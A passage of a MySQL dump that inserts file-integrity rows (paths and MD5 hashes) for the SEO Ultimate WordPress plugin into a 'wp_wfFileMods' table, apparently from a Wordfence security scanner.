(0xf1f904724738fa2564aaac504946eb00, 'wp-content/plugins/seo-ultimate/includes/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x152c985d7b0434ffe8099df387f35900, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/arr.php', 1, 0x00000000000000000000000000000000, 0xedd930e1a8741725a4bddfcdba5e136c),
(0xe0e001fed03b447ebff151485c523413, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/html.php', 1, 0x00000000000000000000000000000000, 0xdc6521a0b1f3dbba1832a88bf7088b92),
(0xddcd3bc9ba9fd0524a7ded9915980c35, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xf06e0b14f80dc25a14e939b0a28d6aa1, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/io.php', 1, 0x00000000000000000000000000000000, 0xdad7f25ddde5ec6de3773527cfc12b47),
(0x290e3b98e3f2c7ecb1fbca8d88c70143, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/jlfunctions.php', 1, 0x00000000000000000000000000000000, 0xd01827c55672813fbc7fbdb13588ed09),
(0x284cbcd1226586801aecba8ab096d833, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/num.php', 1, 0x00000000000000000000000000000000, 0x2b887b956109d52d11eaac2adac17a10),
(0x697a994b0909c1113f6a36d9995b0878, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/str.php', 1, 0x00000000000000000000000000000000, 0x50c6c4345c59980062876322449eccfb),
(0xc365c7c79dbbc7cc9c5d4a944a83cb1b, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/url.php', 1, 0x00000000000000000000000000000000, 0x8f7febbc61afc8eeb616baa7baf6c289),
(0x514be13d21ad98fb7c2764748cf78a87, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/web.php', 1, 0x00000000000000000000000000000000, 0x5e9f176a78641da404ff8c27478d34ca),
(0xcdbd31b9909318874659e79252288696, 'wp-content/plugins/seo-ultimate/includes/jlsuggest/jlsuggest.css', 1, 0x00000000000000000000000000000000, 0xe3813fbd68f38e733273bd9af340eb2c),
(0xb2e53c35061e552e667614e31eb1f4c9, 'wp-content/plugins/seo-ultimate/includes/jlsuggest/jlsuggest.js', 1, 0x00000000000000000000000000000000, 0x6769510f92922cf15ddf66308e6a17e3);
INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x8ea43197757593027b09d0d73c751280, 'wp-content/plugins/seo-ultimate/includes/jlsuggest/loading.gif', 1, 0x00000000000000000000000000000000, 0x9a8269421303631316be4ab5e34870e1),
(0x7dc417a2bb97edff99f79eea58ee1abe, 'wp-content/plugins/seo-ultimate/includes/jlwp/functions.php', 1, 0x00000000000000000000000000000000, 0x1363d824bd0e75d41a9e80c46559c202),
(0x8d7491066f82042160dd08ac6ef1a261, 'wp-content/plugins/seo-ultimate/includes/jlwp/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x08c7fa42ddcfa83bf767ac6c477f113b, 'wp-content/plugins/seo-ultimate/includes/jlwp/jlwp.php', 1, 0x00000000000000000000000000000000, 0xe821e9ff9982195e8213d14d2607adc4),
(0x3c8fabd3b7fdfb224e9e7049a2820cb3, 'wp-content/plugins/seo-ultimate/includes/tabs.js', 1, 0x00000000000000000000000000000000, 0x4fba87a6751d75f9ee871cae0933b272),
(0x3a370586bf9398155e52e197a8d848b0, 'wp-content/plugins/seo-ultimate/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xbc2f4fcbbd61825f1b91e7efcef0e970, 'wp-content/plugins/seo-ultimate/modules/404s/fofs-log.php', 1, 0x00000000000000000000000000000000, 0xec93e8d18cbd6b6950e7f1208698060e),
(0x35863f0c4fa169612252298938117507, 'wp-content/plugins/seo-ultimate/modules/404s/fofs-settings.php', 1, 0x00000000000000000000000000000000, 0x0bd7578617e20eb6218ec063801d5f24),
(0xa5f067d0326275d58d1511477d7501d1, 'wp-content/plugins/seo-ultimate/modules/404s/fofs.css', 1, 0x00000000000000000000000000000000, 0x4f19e8f8a9963e87922881326ccc5e0b),
(0x397a8627e78b3727125f99d53daea120, 'wp-content/plugins/seo-ultimate/modules/404s/fofs.php', 1, 0x00000000000000000000000000000000, 0xa31f5ed2e3320c38eff2d0ebd37b26ff),
(0x8b6dcf20a7542b3368e5d06fd9fafffa, 'wp-content/plugins/seo-ultimate/modules/404s/hit-cache.png', 1, 0x00000000000000000000000000000000, 0xb139ed675fdbdca56f0d73121f36f836),
(0x6a6d5e3138617b97cc5b729f7b263b49, 'wp-content/plugins/seo-ultimate/modules/404s/hit-delete.png', 1, 0x00000000000000000000000000000000, 0x68461ca5187cd2c6af08786467085f2b),
(0x4ec34e221a94ccd3fb18e5f202c87750, 'wp-content/plugins/seo-ultimate/modules/404s/hit-details.png', 1, 0x00000000000000000000000000000000, 0x11c8f930b5b2db98dad42209e0b2bccb),
(0xaef2e50a3ac85dc89b8074c9f5ecede3, 'wp-content/plugins/seo-ultimate/modules/404s/hit-open.png', 1, 0x00000000000000000000000000000000, 0x2f31b7333e57fcb11f281137886ea7ae),
(0xe837ddd5c42a367f2039dfff0b741c28, 'wp-content/plugins/seo-ultimate/modules/404s/hit-redirect.png', 1, 0x00000000000000000000000000000000, 0x51b1852b1cc6ca82d745f7f6d5d5218d),
(0x81c7a5e92414eb851ae2f2bd2417a5a4, 'wp-content/plugins/seo-ultimate/modules/404s/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x88e7f1fc16d3a0d809ea4c0ee2189d7b, 'wp-content/plugins/seo-ultimate/modules/author-links/author-links.php', 1, 0x00000000000000000000000000000000, 0x9200ffb896f24448aa4405cde9329fc5),
(0xf5a506a18451c00d6e963f27448048d1, 'wp-content/plugins/seo-ultimate/modules/author-links/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x7c5776ec780740671091d41741731f6a, 'wp-content/plugins/seo-ultimate/modules/autolinks/autolinks.css', 1, 0x00000000000000000000000000000000, 0x779eccef21899659a174c2beb1b2ec5e),
(0x811a9e67b2797a90f79fc2f4e9bd89dc, 'wp-content/plugins/seo-ultimate/modules/autolinks/autolinks.php', 1, 0x00000000000000000000000000000000, 0xf6ccec50d7c01e6dab65f8dd5394afd0),
(0x48147a01bc4640d24f2f94d6bbde345a, 'wp-content/plugins/seo-ultimate/modules/autolinks/content-autolinks-settings.php', 1, 0x00000000000000000000000000000000, 0xcc34d54813f3b1105837238d0bfeee6e),
(0x8c0ae13ad462e3361841fa2dc41cef3a, 'wp-content/plugins/seo-ultimate/modules/autolinks/content-autolinks.php', 1, 0x00000000000000000000000000000000, 0x00e01e333b28bab1e59a294b6db8078b),
(0x83a6d01d7bbd0df6b3190b22bf904b96, 'wp-content/plugins/seo-ultimate/modules/autolinks/footer-autolinks-settings.php', 1, 0x00000000000000000000000000000000, 0x6d3cdebd1f5b20cad602a4dc64f9266e),
(0x64ba6accbd4f3a7b561dc044f4b2802b, 'wp-content/plugins/seo-ultimate/modules/autolinks/footer-autolinks.php', 1, 0x00000000000000000000000000000000, 0x94d26dcf5b9cdd7f01650f527765581d),
(0x9af1b1bdc3a7d6c5deebd421a6e404bb, 'wp-content/plugins/seo-ultimate/modules/autolinks/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xe69af92274525f9b360caa4283e57be9, 'wp-content/plugins/seo-ultimate/modules/canonical/canonical.php', 1, 0x00000000000000000000000000000000, 0x18876ac78854a42d57feee4e2afaae3b),
(0x11167af27549ed4ec7dba3a3f1ba3030, 'wp-content/plugins/seo-ultimate/modules/canonical/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x3086abd21ef5c7b68817ed30b0526e4b, 'wp-content/plugins/seo-ultimate/modules/class.su-importmodule.php', 1, 0x00000000000000000000000000000000, 0xd4ad9559ef2bcf4fc5e77d393df30ba1),
(0x9d625fe04a0d2e2e8c46854cb94e79c0, 'wp-content/plugins/seo-ultimate/modules/class.su-module.php', 1, 0x00000000000000000000000000000000, 0x8db5102c61e8fb005326acc1f21f82d5),
(0x33f4be23986a77db1d916be718f6d831, 'wp-content/plugins/seo-ultimate/modules/files/files.php', 1, 0x00000000000000000000000000000000, 0xb777d5a88e829ad24dbcb92075aa06e1),
(0xcde39c54ee1c492b37a757f68992e1d4, 'wp-content/plugins/seo-ultimate/modules/files/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xce908b49109b3a5bc567aa77c99ac633, 'wp-content/plugins/seo-ultimate/modules/import-aiosp/import-aiosp.php', 1, 0x00000000000000000000000000000000, 0xf5982daa3d8eab150182e4dcc8814433),
(0xa0e32852e11fe24f5d71baf82765f4af, 'wp-content/plugins/seo-ultimate/modules/import-aiosp/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xd9540ee5ee8d6ddb859a17768f3f46a0, 'wp-content/plugins/seo-ultimate/modules/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x86d97b50b5791aba1595a3b1e8e26dd4, 'wp-content/plugins/seo-ultimate/modules/internal-link-aliases/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xd76823251c0422d711b6d528b21e7647, 'wp-content/plugins/seo-ultimate/modules/internal-link-aliases/internal-link-aliases.css', 1, 0x00000000000000000000000000000000, 0x09621dd61ab561c84687f0871402eef2),
(0x9e4dffc9d5cda0939a99fc99ad680c79, 'wp-content/plugins/seo-ultimate/modules/internal-link-aliases/internal-link-aliases.php', 1, 0x00000000000000000000000000000000, 0xc8272d2ea52694fe7db272ffa024215e),
(0x25953afef743dc49b15370e0683ed23a, 'wp-content/plugins/seo-ultimate/modules/link-nofollow/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x9f26db72eebbb2761fb081446dfd8ffa, 'wp-content/plugins/seo-ultimate/modules/link-nofollow/link-nofollow.php', 1, 0x00000000000000000000000000000000, 0x7f9188173f727770d8957b2f5fd2030c),
(0x7b1be5a6db9a1cf66be9c27fa89bced8, 'wp-content/plugins/seo-ultimate/modules/linkbox/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x282143d7a6dc1a4bae7bf27c1d2b077b, 'wp-content/plugins/seo-ultimate/modules/linkbox/linkbox.css', 1, 0x00000000000000000000000000000000, 0x831f536a945e253d5b50042db4ee377f),
(0x18f5930a33623a0072f42ec3b2dc07eb, 'wp-content/plugins/seo-ultimate/modules/linkbox/linkbox.php', 1, 0x00000000000000000000000000000000, 0x082cd1e9b9a0aeaccf44468c48f328c6),
(0x30e5a6eb29fda78367179cf5a0cc4347, 'wp-content/plugins/seo-ultimate/modules/meta/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xa3f8ebda49755158969cc7a45a121dc4, 'wp-content/plugins/seo-ultimate/modules/meta/meta-descriptions.css', 1, 0x00000000000000000000000000000000, 0xf2010ae777d0112cb4cbb0fd0eb705c9),
(0xa28a39e2e2d9578a52783864199cc824, 'wp-content/plugins/seo-ultimate/modules/meta/meta-descriptions.php', 1, 0x00000000000000000000000000000000, 0x39e0a44f5c601c769515c1dd0bc8ec5c),
(0x76ec7e414ce5fb0c9df4d3f3dfbf42fd, 'wp-content/plugins/seo-ultimate/modules/meta/meta-keywords.php', 1, 0x00000000000000000000000000000000, 0x8d30bf4951ab6cba5a97d44b7d9b9704),
(0x3cc4cc5912c57696d3884defaf045375, 'wp-content/plugins/seo-ultimate/modules/meta/meta-robots.css', 1, 0x00000000000000000000000000000000, 0x2f203fd3a45bb6f77fb91bdcc75f5370),
(0xd2c59c293850195be54c97912f09b2c2, 'wp-content/plugins/seo-ultimate/modules/meta/meta-robots.php', 1, 0x00000000000000000000000000000000, 0xf1bbc430e5f6a0b860bdffd45f849bf6),
(0xfafdde88404a4b4346fbafd384826b2a, 'wp-content/plugins/seo-ultimate/modules/meta/webmaster-verify.css', 1, 0x00000000000000000000000000000000, 0x38887f4f064e4d9fa614e980d7ed725c),
(0xeac4904c34fcf580808760e515171839, 'wp-content/plugins/seo-ultimate/modules/meta/webmaster-verify.php', 1, 0x00000000000000000000000000000000, 0x239a6f11f46d0209cc54c3a0c04533ba),
(0xeb7670cbcc048afe359de0bbca213a57, 'wp-content/plugins/seo-ultimate/modules/misc/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xcc3d87a3e487f1bf5db4d40bf7b75c6b, 'wp-content/plugins/seo-ultimate/modules/misc/misc.php', 1, 0x00000000000000000000000000000000, 0xce8e375f84970700c31e9abc6509ac79),
(0xa80b6b69daf326f7f7d3c856acf8be4c, 'wp-content/plugins/seo-ultimate/modules/modules/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x88a52daa21ba37cc095ec42d2ef18c68, 'wp-content/plugins/seo-ultimate/modules/modules/modules.css', 1, 0x00000000000000000000000000000000, 0x00eb2fc3fb8dc8329693114d045b0312),
(0x182884a0b6cbdaa3cffb4f544a5d41a0, 'wp-content/plugins/seo-ultimate/modules/modules/modules.js', 1, 0x00000000000000000000000000000000, 0x0b0ad65e912f0e8c9cdab5f2c2d6e7ce),
(0x9aadeb0c263a4d87d8fc6122701f91d0, 'wp-content/plugins/seo-ultimate/modules/modules/modules.php', 1, 0x00000000000000000000000000000000, 0x031e56bf79453ed672f473fdb6cf7bab),
(0xb9e244fa4aab2c28ba1e1f2ea22b9895, 'wp-content/plugins/seo-ultimate/modules/modules.css', 1, 0x00000000000000000000000000000000, 0xf4985ba0f93aec55d558a26f10c84929),
(0x085d2aa6cd247247eb87d324edfe474f, 'wp-content/plugins/seo-ultimate/modules/modules.js', 1, 0x00000000000000000000000000000000, 0x7b812121cbd24de42642bf422b3a9595),
(0x20362403547a4a882f9dd71abd457080, 'wp-content/plugins/seo-ultimate/modules/more-links/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x7bfe36d084e4f6e6d69cb79560ee3152, 'wp-content/plugins/seo-ultimate/modules/more-links/more-links.php', 1, 0x00000000000000000000000000000000, 0x6186c8fb7b0b2049d1853c64ec208f71),
(0x9d8c9fae628243298f67e58afb1a1fe7, 'wp-content/plugins/seo-ultimate/modules/noindex/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x0b4c8829d50975f5554513f617e663e4, 'wp-content/plugins/seo-ultimate/modules/noindex/noindex.php', 1, 0x00000000000000000000000000000000, 0xf39cb4ee7e3c7afad8218a4d13c94371),
(0x8685ac28ef53c514cd100d4d2e710441, 'wp-content/plugins/seo-ultimate/modules/opengraph/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x18a607c49c74a70b4a3b30c15497cfd5, 'wp-content/plugins/seo-ultimate/modules/opengraph/opengraph.css', 1, 0x00000000000000000000000000000000, 0x59790796a20330c057f511963c6bbd3d),
(0x47728da0554e360a1490ab463c756266, 'wp-content/plugins/seo-ultimate/modules/opengraph/opengraph.php', 1, 0x00000000000000000000000000000000, 0x69507a9150194a1e904ed7932c2a4fa3),
(0x3caff2592246b2598aa97dc16295b02e, 'wp-content/plugins/seo-ultimate/modules/permalinks/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xccac92799f9602d6fcacd88f9adfa4f0, 'wp-content/plugins/seo-ultimate/modules/permalinks/permalinks.css', 1, 0x00000000000000000000000000000000, 0xbbf69cfa75ddbee8f37ee5b66c8ac6da),
(0xbf7f477036d241fc0585bcfaa542c410, 'wp-content/plugins/seo-ultimate/modules/permalinks/permalinks.php', 1, 0x00000000000000000000000000000000, 0x9276d40c0d847cbf372dfc3468f9e41a),
(0xec6d279f7d96072036f56f7974ac0d15, 'wp-content/plugins/seo-ultimate/modules/rich-snippets/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x00135334995644255f39e8be46a48ccb, 'wp-content/plugins/seo-ultimate/modules/rich-snippets/rich-snippets.php', 1, 0x00000000000000000000000000000000, 0x9d85b4181e2de4bec9efab3d332e2c82),
(0x369de66b9f1f6068c3461bfa1137fb09, 'wp-content/plugins/seo-ultimate/modules/sds-blog/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x4fcb507f24dd2d5eb43806682fe8df43, 'wp-content/plugins/seo-ultimate/modules/sds-blog/sds-blog.css', 1, 0x00000000000000000000000000000000, 0xf78f9b4fe0d4e38161ef1be5eaedd7bc),
(0xfb1fdfdf709aebaee68fbc832b680d8e, 'wp-content/plugins/seo-ultimate/modules/sds-blog/sds-blog.php', 1, 0x00000000000000000000000000000000, 0x217c2cefd249981a7df688eb4d35681c),
(0xd4c2c85a7145f146c890fd7ecaca7700, 'wp-content/plugins/seo-ultimate/modules/settings/global-settings.php', 1, 0x00000000000000000000000000000000, 0xe215cafe3a3fe055a56dc6f7b53e1ffa),
(0xa17f3c9ed2e35c1be3ae06a2645827b1, 'wp-content/plugins/seo-ultimate/modules/settings/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xc5fc7f6e80485a727d55a0d35ce339aa, 'wp-content/plugins/seo-ultimate/modules/settings/install.css', 1, 0x00000000000000000000000000000000, 0xae791b1ac05aaa0b64b97b46eb155c5c),
(0xb1347fe758f5a3fa46cbcafc6a1d5315, 'wp-content/plugins/seo-ultimate/modules/settings/install.php', 1, 0x00000000000000000000000000000000, 0x166fc6040902a651c06d5a86fac615af),
(0x377f827862eb47a269ce9b025fc89f5b, 'wp-content/plugins/seo-ultimate/modules/settings/settings-data.css', 1, 0x00000000000000000000000000000000, 0x455bddbd802bb752dc9d5cda86d03759),
(0x15d1a8331e911c2c275762291c8ec22d, 'wp-content/plugins/seo-ultimate/modules/settings/settings-data.php', 1, 0x00000000000000000000000000000000, 0xac296eae5ff3cdcb355e20aa584344df),
(0xfe63cf220cccdaed4604754dab291ddd, 'wp-content/plugins/seo-ultimate/modules/settings/settings.php', 1, 0x00000000000000000000000000000000, 0xc68966d372de98c62f57ff76c13d264c),
(0x608bbf242a8be9b939f55aaa0803781d, 'wp-content/plugins/seo-ultimate/modules/settings/uninstall.php', 1, 0x00000000000000000000000000000000, 0x59019b6b485497662f86defe3b3c32a5),
(0x466e27d6a27ed4bbda7983a5f5084198, 'wp-content/plugins/seo-ultimate/modules/sharing-buttons/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x9b88ab4a3bb3e9534076e7f56442229b, 'wp-content/plugins/seo-ultimate/modules/sharing-buttons/sharing-buttons.css', 1, 0x00000000000000000000000000000000, 0xee016dc970c980a57254d325dbdec9cc),
(0x4b5fd3498be989a3ea8fed2fc929908c, 'wp-content/plugins/seo-ultimate/modules/sharing-buttons/sharing-buttons.php', 1, 0x00000000000000000000000000000000, 0xc86292ce0d01f9df95982d882f6f296d),
(0x41bc81fe500fc67d686f08337c1bbfee, 'wp-content/plugins/seo-ultimate/modules/slugs/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x7f643945b545cad756597104b51dd9c7, 'wp-content/plugins/seo-ultimate/modules/slugs/slugs.php', 1, 0x00000000000000000000000000000000, 0xc63a21ce643f0485d1df54405c997c31),
(0xddd1e1aeb80d0e3595846cc134b6591a, 'wp-content/plugins/seo-ultimate/modules/titles/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x9bc505036047ec1f4bf64a85c54eb939, 'wp-content/plugins/seo-ultimate/modules/titles/titles.php', 1, 0x00000000000000000000000000000000, 0x605837038b9225ce17e0c8679b522977),
(0x82384f617f3ec1926c05c5984c5884f1, 'wp-content/plugins/seo-ultimate/modules/user-code/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x4ea95a5d9e31ec25f7800f55af035044, 'wp-content/plugins/seo-ultimate/modules/user-code/user-code.php', 1, 0x00000000000000000000000000000000, 0x6e6f3d9350e4db89fc6a10dc94949484),
(0x3712803c820b752be48655f19099d581, 'wp-content/plugins/seo-ultimate/modules/widgets/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xa56a43b04e06fb15e0bf30c6ac4d79ca, 'wp-content/plugins/seo-ultimate/modules/widgets/widgets.php', 1, 0x00000000000000000000000000000000, 0xb04e04514828be76c1f4806855c34461),
(0xdd3e2b3e5a5e66759fd5954c8fbc36ba, 'wp-content/plugins/seo-ultimate/modules/wp-settings/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x99a21a9a40ead4e344b18ebcb054b9e6, 'wp-content/plugins/seo-ultimate/modules/wp-settings/wp-settings.php', 1, 0x00000000000000000000000000000000, 0xe76e3860ca6f89cbe60c34453621f111),
(0x7cb4cf5d551c4dbc450ac9881ae01fd7, 'wp-content/plugins/seo-ultimate/plugin/class.seo-ultimate.php', 1, 0x00000000000000000000000000000000, 0x3a8cba4016e1ba42b834060d3207d843),
(0x22d58f52151816e21feec98d32d62f15, 'wp-content/plugins/seo-ultimate/plugin/class.su-installer.php', 1, 0x00000000000000000000000000000000, 0xbea0451fe8bc88f1fc784188a39456d6),
(0x671e3c408552dcb4195f0f3fdd9d0a5b, 'wp-content/plugins/seo-ultimate/plugin/global.css', 1, 0x00000000000000000000000000000000, 0x9c66bc382616af58db406a23ec3fe5a9),
(0x8b599b4ce9cb31d38b149c83f3b907fe, 'wp-content/plugins/seo-ultimate/plugin/global.js', 1, 0x00000000000000000000000000000000, 0x9902008d41ec840384e09d4ea7e817e6),
(0x914db4606aec27f8b07099790ecb0035, 'wp-content/plugins/seo-ultimate/plugin/images/error.png', 1, 0x00000000000000000000000000000000, 0xe4dd51f46566ed3ceacdc900bf2fdf01),
(0x55f228db6ad11b1c446d0c3eb4b83034, 'wp-content/plugins/seo-ultimate/plugin/images/icon.png', 1, 0x00000000000000000000000000000000, 0x9618d60d6ae956f263258d279dd1ceac),
(0xc6c771be0274917a58916e71f10012a6, 'wp-content/plugins/seo-ultimate/plugin/images/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x80895af7b3ae53fe43d2ddc61a1404e1, 'wp-content/plugins/seo-ultimate/plugin/images/info.png', 1, 0x00000000000000000000000000000000, 0x3750c701d2ec35a45d289b9b9c1a0667),
(0xfbe04b32b6b8950a2cf6515bb0a04d73, 'wp-content/plugins/seo-ultimate/plugin/images/sds-logo.png', 1, 0x00000000000000000000000000000000, 0xe95c01aa4fa2be222149a61a8487abdb),
(0x67caadb3be8b4b4d3bba2e1e90c60953, 'wp-content/plugins/seo-ultimate/plugin/images/seo.png', 1, 0x00000000000000000000000000000000, 0x05ca48f89822be2e26e8eb2124e09ea5),
(0xb0559951ca900c82f54941d0a9dc7637, 'wp-content/plugins/seo-ultimate/plugin/images/success.png', 1, 0x00000000000000000000000000000000, 0x8bfed48756f192ed7afe6eaa4799aae4),
(0x2334fce107f1c15f10cff8f40b80183d, 'wp-content/plugins/seo-ultimate/plugin/images/warning.png', 1, 0x00000000000000000000000000000000, 0xc847e1076da70df83ef5284622b82a74),
(0x153daff1780d4a5f8a8a98ff8665d874, 'wp-content/plugins/seo-ultimate/plugin/images/wp-ultimate.gif', 1, 0x00000000000000000000000000000000, 0xefc658c2c484c7bf7af5158175511f38),
(0x41c52db662e338d57c8740d15583b450, 'wp-content/plugins/seo-ultimate/plugin/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x5d02775cce6db8b90bc2a7861f33799e, 'wp-content/plugins/seo-ultimate/plugin/su-constants.php', 1, 0x00000000000000000000000000000000, 0x9972cdff5cb92310bb5670ce990eeff4),
(0xf8885f9e9c0d2cb55ad55cb4c5758e49, 'wp-content/plugins/seo-ultimate/plugin/su-functions.php', 1, 0x00000000000000000000000000000000, 0x739366b68da2884966ce6d49a6108246),
(0x52721420e9b0e8848b5433b4ea6aa5ec, 'wp-content/plugins/seo-ultimate/readme.txt', 1, 0x00000000000000000000000000000000, 0x327c226574a4f488d27a4fbe98ae1c58),
(0xf855c905957c46d8f52a3a73d5111916, 'wp-content/plugins/seo-ultimate/screenshot-1.png', 1, 0x00000000000000000000000000000000, 0xbb6125da76ae0310b13c965e2a13fc5c),
(0x0f89b28ae651c041c0e2e5c3887680d3, 'wp-content/plugins/seo-ultimate/screenshot-10.png', 1, 0x00000000000000000000000000000000, 0x7ea061c85aafd744ef122cdb5fbfb370),
(0xb7982df8752337aae55c6d6ee818623b, 'wp-content/plugins/seo-ultimate/screenshot-11.png', 1, 0x00000000000000000000000000000000, 0xdf51bbc87c48c0ea09a97ab9d6d9639d),
(0xf6be4ae66961055ae1f6a07e77462404, 'wp-content/plugins/seo-ultimate/screenshot-12.png', 1, 0x00000000000000000000000000000000, 0xbcb46af015dc5193173edc04a5edbcd3),
(0x6b7d8018fc017cfe05160c412a35b6e0, 'wp-content/plugins/seo-ultimate/screenshot-13.png', 1, 0x00000000000000000000000000000000, 0x3394c5f2d21f61c1e6d21153a7499c04),
(0x24423936972784ca8123ca87ef2f2ad5, 'wp-content/plugins/seo-ultimate/screenshot-14.png', 1, 0x00000000000000000000000000000000, 0xad9ed675ec29b4091970585f39521cb1),
(0x962d8edcf265c0e31c4b5fe55e4342a3, 'wp-content/plugins/seo-ultimate/screenshot-15.png', 1, 0x00000000000000000000000000000000, 0x8a1e85368e2d204ff8fc14938b2eba98),
(0x5ea5850bb8a5d740d7bfd75f1a339d8a, 'wp-content/plugins/seo-ultimate/screenshot-16.png', 1, 0x00000000000000000000000000000000, 0xf3a4b94d1c99aa9d9bbf887e1b596018),
(0x81e17a98f64572b3d3aa200d11e543b1, 'wp-content/plugins/seo-ultimate/screenshot-17.png', 1, 0x00000000000000000000000000000000, 0x5c5d49c8f466abae1fcc6bc3e9b29738),
(0x3897ec35e718d18d5084cdd515cb4741, 'wp-content/plugins/seo-ultimate/screenshot-18.png', 1, 0x00000000000000000000000000000000, 0xe3bb5e928c158281c5018fcc87fe6c6a),
(0x2491c25c38c6b73e32719ee9d63cfa5f, 'wp-content/plugins/seo-ultimate/screenshot-19.png', 1, 0x00000000000000000000000000000000, 0xdcbf266a1cabbbcd0e533149d693ecd6),
(0x29875aea3d0d72d6b08e28e19ade09b9, 'wp-content/plugins/seo-ultimate/screenshot-2.png', 1, 0x00000000000000000000000000000000, 0xcf9295ee48a5e78022f96b7dce261433),
(0x1f2e50177e9b9060ca6ca6cd80c26a3e, 'wp-content/plugins/seo-ultimate/screenshot-20.png', 1, 0x00000000000000000000000000000000, 0x3d2b8bb2d5a6d5cc44d784321858ecaa),
(0x6795464ba16c34af5b8cd132aaf3f672, 'wp-content/plugins/seo-ultimate/screenshot-21.png', 1, 0x00000000000000000000000000000000, 0x685148f8a8be7f2146a48416bf69a727),
(0xde1136b9dc06d72a11400384b7a1b268, 'wp-content/plugins/seo-ultimate/screenshot-22.png', 1, 0x00000000000000000000000000000000, 0xd16aa62de10827c68978747afa0070f3),
(0x76fde56f2d449008de91f97ca40f8393, 'wp-content/plugins/seo-ultimate/screenshot-23.png', 1, 0x00000000000000000000000000000000, 0xac8f8e44d0bc233ad86f02e6ba08a485),
(0x6c3972754349ab846bfa57aa5dff279e, 'wp-content/plugins/seo-ultimate/screenshot-24.png', 1, 0x00000000000000000000000000000000, 0xcce35301ce7fdddb7b2c8a45af32ff82),
(0xa290291785ae199bab1353f34ef23139, 'wp-content/plugins/seo-ultimate/screenshot-3.png', 1, 0x00000000000000000000000000000000, 0x61ba250474ca8469635ef4b58a37e81c),
(0x624effabcd4dbbfae3cc9ab65ee199d4, 'wp-content/plugins/seo-ultimate/screenshot-4.png', 1, 0x00000000000000000000000000000000, 0x81da7282a4cd1887eed5f0e7d47c2670),
(0x7ca7572183b3cbe4f3c945788738a188, 'wp-content/plugins/seo-ultimate/screenshot-5.png', 1, 0x00000000000000000000000000000000, 0xeea2a5c7c262e8e5fb5531f72a4ac0a2),
(0x7e0974229df48b1e59d6660bf74796a9, 'wp-content/plugins/seo-ultimate/screenshot-6.png', 1, 0x00000000000000000000000000000000, 0x7ddb74bf966b395002c3359e1ac61bfc),
(0x5f3ee3fd6d6de20d18577024e3be5fd4, 'wp-content/plugins/seo-ultimate/screenshot-7.png', 1, 0x00000000000000000000000000000000, 0x5adc58161b32fd329a196aa66e26faef),
(0xf0d5377f346dc71659b59d90562e92bc, 'wp-content/plugins/seo-ultimate/screenshot-8.png', 1, 0x00000000000000000000000000000000, 0x3dfd1264e8d34555bb5f138a87a1ce7b),
(0xa431a894d377eba80a84072f6a0c6776, 'wp-content/plugins/seo-ultimate/screenshot-9.png', 1, 0x00000000000000000000000000000000, 0xc2ec0087eec45fd1302a4bd6451138a5),
